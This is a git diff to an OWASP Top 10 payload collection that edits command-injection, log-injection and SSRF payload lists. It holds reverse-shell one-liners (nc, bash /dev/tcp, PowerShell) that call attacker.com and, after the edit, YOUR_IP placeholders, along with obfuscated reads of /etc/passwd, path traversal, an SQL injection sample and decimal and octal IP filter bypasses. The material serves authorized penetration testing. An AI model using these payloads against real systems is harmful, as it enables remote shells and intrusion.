diff --git a/OWASP-Top-10/A03-Injection/command-injection-payloads.txt b/OWASP-Top-10/A03-Injection/command-injection-payloads.txt index bfd5c9a..f7e58d1 100644 --- a/OWASP-Top-10/A03-Injection/command-injection-payloads.txt +++ b/OWASP-Top-10/A03-Injection/command-injection-payloads.txt @@ -74,7 +74,7 @@ c'a't /etc/passwd c"a"t /etc/passwd c\at /etc/passwd -# Reverse shell payloads (for testing only) -; nc -e /bin/sh attacker.com 4444 -| bash -i >& /dev/tcp/attacker.com/4444 0>&1 -& powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('attacker.com',4444);" +# Reverse shell payloads (for authorized testing only - replace YOUR_IP and PORT) +; nc -e /bin/sh YOUR_IP PORT +| bash -i >& /dev/tcp/YOUR_IP/PORT 0>&1 +& powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('YOUR_IP',PORT);" diff --git a/OWASP-Top-10/A09-Security-Logging-Monitoring-Failures/log-injection-payloads.txt b/OWASP-Top-10/A09-Security-Logging-Monitoring-Failures/log-injection-payloads.txt index 9330d52..641d5ee 100644 --- a/OWASP-Top-10/A09-Security-Logging-Monitoring-Failures/log-injection-payloads.txt +++ b/OWASP-Top-10/A09-Security-Logging-Monitoring-Failures/log-injection-payloads.txt @@ -32,18 +32,19 @@ user\x00admin /var/log/auth.log ../../../var/log/syslog -# Events that should be logged (test if they're logged) -- Failed login attempts -- Successful login -- Password changes -- Privilege escalation -- Administrative actions -- Access to sensitive data -- Invalid input -- Authentication failures -- Authorization failures +# Events to test if they appear in logs +# Try these payloads and verify they are logged appropriately: +# - Failed login attempts +# - Successful login +# - Password changes +# - Privilege escalation attempts +# - Administrative actions +# - Access to sensitive data +# - Invalid input +# - Authentication failures +# - Authorization failures -# Events to check in logs +# Sample payloads to check logging behavior SELECT * FROM users WHERE username='admin' AND password='wrong' ../../../etc/passwd diff --git a/OWASP-Top-10/A10-Server-Side-Request-Forgery/ssrf-payloads.txt b/OWASP-Top-10/A10-Server-Side-Request-Forgery/ssrf-payloads.txt index e36d51e..d9b06a2 100644 --- a/OWASP-Top-10/A10-Server-Side-Request-Forgery/ssrf-payloads.txt +++ b/OWASP-Top-10/A10-Server-Side-Request-Forgery/ssrf-payloads.txt @@ -51,9 +51,10 @@ ldap://127.0.0.1:389 tftp://127.0.0.1:69 # Bypassing filters -# Using decimal IP -http://2130706433 (127.0.0.1) -http://3232235521 (192.168.0.1) +# Using decimal IP (127.0.0.1 in decimal) +http://2130706433 +# Using decimal IP (192.168.0.1 in decimal) +http://3232235521 # Using octal IP http://0177.0.0.1